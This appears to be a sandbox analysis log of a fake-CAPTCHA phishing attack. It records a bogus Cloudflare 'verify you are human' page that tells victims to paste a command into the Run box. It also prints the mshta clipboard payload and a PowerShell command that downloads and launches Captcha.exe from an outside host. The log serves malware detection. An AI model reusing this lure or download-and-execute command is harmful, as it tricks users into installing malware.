        Source: unknownHTTP traffic detected: POST /$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData HTTP/1.1Host: ogads-pa.clients6.google.comConnection: keep-aliveContent-Length: 67X-Goog-Api-Key: AIzaSyCbsbvGCe7C9mCtdaTycZB2eUFuzsYKG_Esec-ch-ua-platform: "Windows"X-User-Agent: grpc-web-javascript/0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/json+protobufsec-ch-ua-mobile: ?0Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CPyDywE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
        Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
        Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
        Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
        Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
        Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
        Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
        Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
        Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
        Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
        Source: unknownHTTPS traffic detected: 142.251.41.4:443 -> 192.168.2.18:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 66.96.147.114:443 -> 192.168.2.18:49810 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 66.96.147.114:443 -> 192.168.2.18:49811 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 66.96.147.114:443 -> 192.168.2.18:49825 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 150.171.84.18:443 -> 192.168.2.18:50002 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 150.171.84.18:443 -> 192.168.2.18:50004 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 66.96.147.114:443 -> 192.168.2.18:50009 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 66.96.147.114:443 -> 192.168.2.18:50010 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.80.42:443 -> 192.168.2.18:50019 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.80.14:443 -> 192.168.2.18:50020 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.80.42:443 -> 192.168.2.18:50021 version: TLS 1.2

        System Summary

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\Captcha.exeJump to dropped file
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6580_1940247472
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6580_1940247472
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
        Source: classification engineClassification label: mal100.phis.evad.win@37/15@33/115
        Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MX73DBBW\p3[1].htm
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3840:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_catfdnkv.dpc.ps1
        Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1912,i,8822539610411515433,2458465651677738327,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:3
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://anaamw.om/p3.php/1"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1912,i,8822539610411515433,2458465651677738327,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:3
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: unknownProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://anaamw.com/p3.php
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\Captcha.exe "C:\ProgramData\Captcha.exe"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\Captcha.exe "C:\ProgramData\Captcha.exe"
        Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: slc.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
        Source: C:\ProgramData\Captcha.exeSection loaded: cryptbase.dll
        Source: C:\ProgramData\Captcha.exeSection loaded: winmm.dll
        Source: C:\ProgramData\Captcha.exeSection loaded: powrprof.dll
        Source: C:\ProgramData\Captcha.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"

        Persistence and Installation Behavior

        barindex
        Source: Chrome DOM: 1.3OCR Text: cloudflare.com Verify seconds. Complete these Verification steps To better prove you are not a rabat, please: 1. Press & hold the Windows Key + R 2. In the verification window, press Ctrl + V 3. Press Enter on the keyboard to finish cloud of your connection before proceeding. Yau fully agree: I am not a robot - Cloudflare Verification 10: 89ad7f Perform the steps above to finish verification VERIFY Ray ID: cceSZ1hbaddc6Z Performance & security by Cloudflare Cloudflare
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeClipboard modification: mshta https://anaamw.com/p3.php
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\Captcha.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\Captcha.exeJump to dropped file
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
